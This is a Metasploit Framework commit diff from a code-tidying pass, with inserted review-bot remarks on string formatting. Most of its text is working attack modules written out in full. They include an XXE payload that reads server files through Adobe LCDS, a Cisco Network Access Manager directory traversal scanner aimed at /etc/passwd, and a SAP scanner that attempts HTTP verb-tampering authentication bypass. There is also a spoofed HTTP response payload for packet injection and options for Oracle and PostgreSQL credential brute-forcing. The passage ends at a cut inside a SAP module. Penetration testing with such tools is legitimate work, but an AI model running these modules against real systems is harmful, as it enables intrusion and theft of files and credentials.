big msftidy pass, ping me if there are issues

git-svn-id: file:///home/svn/framework3/trunk@14034 4d416f70-5f16-0410-b530-b9f4589650da
Joshua Drake
2011-10-23 11:56:13 +00:00
parent 5caaedca7a
commit 62c8c6ea9f
160 changed files with 2626 additions and 2405 deletions
+50 -2
@@ -57,8 +57,56 @@ class Metasploit3 < Msf::Auxiliary
p.tcp_sport = datastore['SPORT'].to_i
p.tcp_window = 3072
# That's some mighty fine ASCII right there.
p.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53\x6
5\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a"
# The following hex blob contains an HTTP response with a chunked-encoding
# length of 0. The ASCII version is below in a block comment.
#
# We represent it like this to prevent tools from mangling the carriage
# returns within it.
#
p.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75" +
"\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32" +
"\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39" +
"\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a" +
"\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28" +
"\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20" +
"\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31" +
"\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61" +
"\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c" +
"\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f" +
"\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65" +
"\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50" +
"\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34" +
"\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20" +
"\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31" +
"\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50" +
"\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74" +
"\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33" +
"\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22" +
"\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20" +
"\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20" +
"\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20" +
"\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78" +
"\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e" +
"\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30" +
"\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f" +
"\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d" +
"\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74" +
"\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d" +
"\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f" +
"\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53" +
"\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45" +
"\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30" +
"\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64" +
"\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44" +
"\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a" +
"\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78" +
"\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e" +
"\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72" +
"\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a" +
"\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" +
"\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74" +
"\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d" +
"\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a"
p.recalc
capture_sendto(p, rhost)
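Review bot: The new `p.payload =` literal is built at runtime from 44 fragments joined with `+`, so every call allocates an intermediate String per fragment even though the content is constant; Ruby folds adjacent literals at parse time, so ending each fragment line with ` \` instead of ` +` (e.g. `p.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75" \`) gives one literal with the same bytes and keeps the hex-only layout the comment asks for. The added comment also says the ASCII rendering "is below in a block comment", but no such block is in this hunk; if it is not present after the `p.recalc` line, either add a `=begin`/`=end` rendering of the response or drop that sentence so readers are not sent looking for it. The method containing this assignment starts before the hunk.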
@@ -64,7 +64,15 @@ class Metasploit3 < Msf::Auxiliary
"/lcds-samples/messagebroker/httpsecure", # LCDS -- SSL
]
postrequest = "<\?xml version=\"1.0\" encoding=\"utf-8\"\?><\!DOCTYPE test [ <\!ENTITY x3 SYSTEM \"#{datastore['FILE']}\"> ]><amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\"><body><object type=\"flex.messaging.messages.CommandMessage\"><traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>"
postrequest = "<\?xml version=\"1.0\" encoding=\"utf-8\"\?>"
postrequest << "<\!DOCTYPE test [ <\!ENTITY x3 SYSTEM \"#{datastore['FILE']}\"> ]>"
postrequest << "<amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\">"
postrequest << "<body><object type=\"flex.messaging.messages.CommandMessage\"><traits>"
postrequest << "<string>body</string><string>clientId</string><string>correlationId</string><string>destination</string>"
postrequest << "<string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string>"
postrequest << "<string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object>"
postrequest << "<traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string>"
postrequest << "<int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>"
path.each do | check |
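Review bot: `datastore['FILE']` is interpolated unescaped into the quoted `SYSTEM` literal on the second `postrequest <<` line, so a FILE value containing a double quote yields malformed XML and the probe fails without a clear message; a guard before the string is assembled makes that explicit, e.g. `raise ArgumentError, "FILE must not contain a double quote" if datastore['FILE'].include?('"')`. The remaining fragments are static, so splitting them into `<<` appends only affects line length and could equally be a single frozen literal. The `path.each` loop and the enclosing method continue outside the hunk.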
@@ -1,84 +1,84 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WMAPScanServer
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability',
'Version' => '$Revision$',
'Description' => %q{
This module tests whether a directory traversal vulnerablity is present
in versions of Cisco Network Access Manager 4.8.x You may wish to change
FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.
},
'References' =>
[
[ 'CVE', '2011-3305' ],
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WMAPScanServer
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability',
'Version' => '$Revision$',
'Description' => %q{
This module tests whether a directory traversal vulnerablity is present
in versions of Cisco Network Access Manager 4.8.x You may wish to change
FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.
},
'References' =>
[
[ 'CVE', '2011-3305' ],
[ 'OSVDB', '76080'],
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ],
[ 'URL', 'http://dev.metasploit.com/redmine/issues/5673' ]
],
'Author' => [ 'nenad' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(443),
OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),
], self.class)
end
def run_host(ip)
traversal = '../../'
part1= '/admin/file_download?tag='
part2 = '&fileType=snapshot'
begin
print_status("Attempting to connect to #{rhost}:#{rport}")
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/admin',
}, 25)
if (res)
1.upto(datastore['MAXDIRS']) do |level|
try = traversal * level
traversalstring = part1 + try + datastore['FILE'] + part2
res = send_request_raw(
{
'method' => 'GET',
'uri' => traversalstring,
}, 25)
if (res and res.code == 200)
print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}")
break
elsif (res and res.code)
print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n")
end
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ],
[ 'URL', 'http://dev.metasploit.com/redmine/issues/5673' ]
],
'Author' => [ 'nenad' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(443),
OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),
], self.class)
end
def run_host(ip)
traversal = '../../'
part1= '/admin/file_download?tag='
part2 = '&fileType=snapshot'
begin
print_status("Attempting to connect to #{rhost}:#{rport}")
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/admin',
}, 25)
if (res)
1.upto(datastore['MAXDIRS']) do |level|
try = traversal * level
traversalstring = part1 + try + datastore['FILE'] + part2
res = send_request_raw(
{
'method' => 'GET',
'uri' => traversalstring,
}, 25)
if (res and res.code == 200)
print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}")
break
elsif (res and res.code)
print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n")
end
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
@@ -124,7 +124,9 @@ class Metasploit3 < Msf::Auxiliary
return if not conn
webdav_req = %q|<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/><getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/><checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>|
webdav_req = '<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/>' +
'<getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/>' +
'<checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>'
File.open(datastore['DICTIONARY'], 'rb').each do |testf|
begin
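Review bot: The three single-quoted fragments on the new `webdav_req =` lines are concatenated with `+` on every call although the body is constant; ending the first two lines with ` \` instead of ` +` lets the parser fold them into one literal, or the PROPFIND body can be hoisted to a class-level constant such as `WEBDAV_PROPFIND = '<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:">...</propfind>'.freeze`. The identical literal is rewritten the same way in the following hunk (`@@ -59,7 +59,9 @@`) of another module, where the same remark applies. The enclosing method starts before the hunk and its `File.open(...).each` loop continues past it.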
@@ -59,7 +59,9 @@ class Metasploit3 < Msf::Auxiliary
vhost = datastore['VHOST'] || wmap_target_host
prot = datastore['SSL'] ? 'https' : 'http'
webdav_req = %q|<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/><getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/><checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>|
webdav_req = '<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/>' +
'<getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/>' +
'<checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>'
begin
res = send_request_cgi({
+2 -2
@@ -1,5 +1,5 @@
##
# $Id: $
# $Id$
##
##
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'HTTP Page Scraper',
'Version' => '$Revision: 13183 $',
'Version' => '$Revision$',
'Description' => 'Scrap defined data from a specific web page based on a regular expresion',
'Author' => ['et'],
'License' => MSF_LICENSE
@@ -46,7 +46,8 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('URI', [ true, 'Oracle iSQLPlus path.', '/isqlplus/']),
OptString.new('SID', [ false, 'Oracle SID' ]),
OptInt.new('TIMEOUT', [false, 'Time to wait for HTTP responses', 60]),
OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line", File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]),
OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line",
File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]),
OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", false]),
], self.class)
@@ -40,9 +40,12 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_userpass.txt") ]),
OptPath.new('USER_FILE', [ false, "File containing users, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_user.txt") ]),
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_pass.txt") ]),
OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line",
File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_userpass.txt") ]),
OptPath.new('USER_FILE', [ false, "File containing users, one per line",
File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_user.txt") ]),
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_pass.txt") ]),
], self.class)
deregister_options('SQL')
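Review bot: The rewrapped `USERPASS_FILE` description on the new side still reads `space-seperated`; since the line is being rewritten anyway, correct the spelling to `"File containing (space-separated) users and passwords, one pair per line",`. The `register_options` call begins before the hunk.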
+157 -157
@@ -1,157 +1,157 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'SAP URL Scanner',
'Description' => %q{
This module scans for commonly found SAP Internet Communication Manager URLs
and outputs return codes for the user.
},
'Version' => '$Revision$',
'Author' => [ 'Chris John Riley' ],
'References' =>
[
[ 'CVE', '2010-0738' ] # VERB auth bypass
],
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('VERB', [true, "Verb for auth bypass testing", "HEAD"]),
OptString.new('URLFILE', [true, "SAP ICM Paths File", "sap_icm_paths.txt"])
], self.class)
end
# Base Structure of module borrowed from jboss_vulnscan
def run_host(ip)
# If URLFILE is set empty, obviously the user made a silly mistake
if datastore['URLFILE'].empty?
print_error("Please specify a URLFILE")
return
end
# Initialize the actual URLFILE path
if datastore['URLFILE'] == "sap_icm_paths.txt"
url_file = "#{Msf::Config.data_directory}/wordlists/#{datastore['URLFILE']}"
else
# Not the default sap_icm_paths file
url_file = datastore['URLFILE']
end
# If URLFILE path doesn't exist, no point to continue the rest of the script
if not File.exists?(url_file)
print_error("Required URL list #{url_file} was not found")
return
end
res = send_request_cgi(
{
'uri' => "/" + Rex::Text.rand_text_alpha(12),
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
if res
print_status("Note: Please note these URLs may or may not be of interest based on server configuration")
@info = []
if not res.headers['Server'].nil?
@info << res.headers['Server']
print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}")
else
print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header")
end
if (res.body and /class="note">(.*)code:(.*)</i.match(res.body) )
print_error("#{rhost}:#{rport} SAP ICM error message: #{$2}")
end
# Load URLs
urls_to_check = []
f = File.open(url_file)
f.each_line do |line|
urls_to_check.push line
end
print_status("#{rhost}:#{rport} Beginning URL check")
urls_to_check.each do |url|
check_url(url.strip)
end
else
print_error("#{rhost}:#{rport} No response received")
end
end
def check_url(url)
res = send_request_cgi({
'uri' => url,
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
if (res)
if not @info.include?(res.headers['Server']) and not res.headers['Server'].nil?
print_good("New server header seen [#{res.headers['Server']}]")
@info << res.headers['Server'] #Add To seen server headers
end
case
when res.code == 200
print_good("#{rhost}:#{rport} #{url} - does not require authentication (200)")
when res.code == 403
print_good("#{rhost}:#{rport} #{url} - restricted (403)")
when res.code == 401
print_good("#{rhost}:#{rport} #{url} - requires authentication (401): #{res.headers['WWW-Authenticate']}")
# Attempt verb tampering bypass
bypass_auth(url)
when res.code == 404
# Do not return by default, only display in verbose mode
vprint_status("#{rhost}:#{rport} #{url.strip} - not found (404)")
when res.code == 500
print_good("#{rhost}:#{rport} #{url} - produced a server error (500)")
when res.code == 301, res.code == 302
print_good("#{rhost}:#{rport} #{url} - redirected (#{res.code}) to #{res.headers['Location']} (not following)")
else
print_status("#{rhost}:#{rport} - unhandle response code #{res.code}")
end
else
print_status("#{rhost}:#{rport} #{url} - not found (No Repsonse code Received)")
end
end
def bypass_auth(url)
print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})")
res = send_request_raw({
'uri' => url,
'method' => datastore['VERB'],
'version' => '1.0' # 1.1 makes the head request wait on timeout for some reason
}, 20)
if (res and res.code == 200)
print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering")
else
print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
end
end
end
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'SAP URL Scanner',
'Description' => %q{
This module scans for commonly found SAP Internet Communication Manager URLs
and outputs return codes for the user.
},
'Version' => '$Revision$',
'Author' => [ 'Chris John Riley' ],
'References' =>
[
[ 'CVE', '2010-0738' ] # VERB auth bypass
],
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('VERB', [true, "Verb for auth bypass testing", "HEAD"]),
OptString.new('URLFILE', [true, "SAP ICM Paths File", "sap_icm_paths.txt"])
], self.class)
end
# Base Structure of module borrowed from jboss_vulnscan
def run_host(ip)
# If URLFILE is set empty, obviously the user made a silly mistake
if datastore['URLFILE'].empty?
print_error("Please specify a URLFILE")
return
end
# Initialize the actual URLFILE path
if datastore['URLFILE'] == "sap_icm_paths.txt"
url_file = "#{Msf::Config.data_directory}/wordlists/#{datastore['URLFILE']}"
else
# Not the default sap_icm_paths file
url_file = datastore['URLFILE']
end
# If URLFILE path doesn't exist, no point to continue the rest of the script
if not File.exists?(url_file)
print_error("Required URL list #{url_file} was not found")
return
end
res = send_request_cgi(
{
'uri' => "/" + Rex::Text.rand_text_alpha(12),
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
if res
print_status("Note: Please note these URLs may or may not be of interest based on server configuration")
@info = []
if not res.headers['Server'].nil?
@info << res.headers['Server']
print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}")
else
print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header")
end
if (res.body and /class="note">(.*)code:(.*)</i.match(res.body) )
print_error("#{rhost}:#{rport} SAP ICM error message: #{$2}")
end
# Load URLs
urls_to_check = []
f = File.open(url_file)
f.each_line do |line|
urls_to_check.push line
end
print_status("#{rhost}:#{rport} Beginning URL check")
urls_to_check.each do |url|
check_url(url.strip)
end
else
print_error("#{rhost}:#{rport} No response received")
end
end
def check_url(url)
res = send_request_cgi({
'uri' => url,
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
if (res)
if not @info.include?(res.headers['Server']) and not res.headers['Server'].nil?
print_good("New server header seen [#{res.headers['Server']}]")
@info << res.headers['Server'] #Add To seen server headers
end
case
when res.code == 200
print_good("#{rhost}:#{rport} #{url} - does not require authentication (200)")
when res.code == 403
print_good("#{rhost}:#{rport} #{url} - restricted (403)")
when res.code == 401
print_good("#{rhost}:#{rport} #{url} - requires authentication (401): #{res.headers['WWW-Authenticate']}")
# Attempt verb tampering bypass
bypass_auth(url)
when res.code == 404
# Do not return by default, only display in verbose mode
vprint_status("#{rhost}:#{rport} #{url.strip} - not found (404)")
when res.code == 500
print_good("#{rhost}:#{rport} #{url} - produced a server error (500)")
when res.code == 301, res.code == 302
print_good("#{rhost}:#{rport} #{url} - redirected (#{res.code}) to #{res.headers['Location']} (not following)")
else
print_status("#{rhost}:#{rport} - unhandle response code #{res.code}")
end
else
print_status("#{rhost}:#{rport} #{url} - not found (No Repsonse code Received)")
end
end
def bypass_auth(url)
print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})")
res = send_request_raw({
'uri' => url,
'method' => datastore['VERB'],
'version' => '1.0' # 1.1 makes the head request wait on timeout for some reason
}, 20)
if (res and res.code == 200)
print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering")
else
print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
end
end
end
@@ -1,192 +1,192 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'SAP Management Console Get Process Parameters',
'Version' => '$Revision$',
'Description' => %q{
This module simply attempts to output a SAP process parameters and
configuration settings through the SAP Management Console SOAP Interface.
},
'References' =>
[
# General
[ 'URL', 'http://blog.c22.cc' ]
],
'Author' => [ 'Chris John Riley' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(50013),
OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']),
OptString.new('MATCH', [false, 'Display matches e.g login/', '']),
], self.class)
register_autofilter_ports([ 50013 ])
deregister_options('RHOST')
end
def rport
datastore['RPORT']
end
def run_host(ip)
res = send_request_cgi({
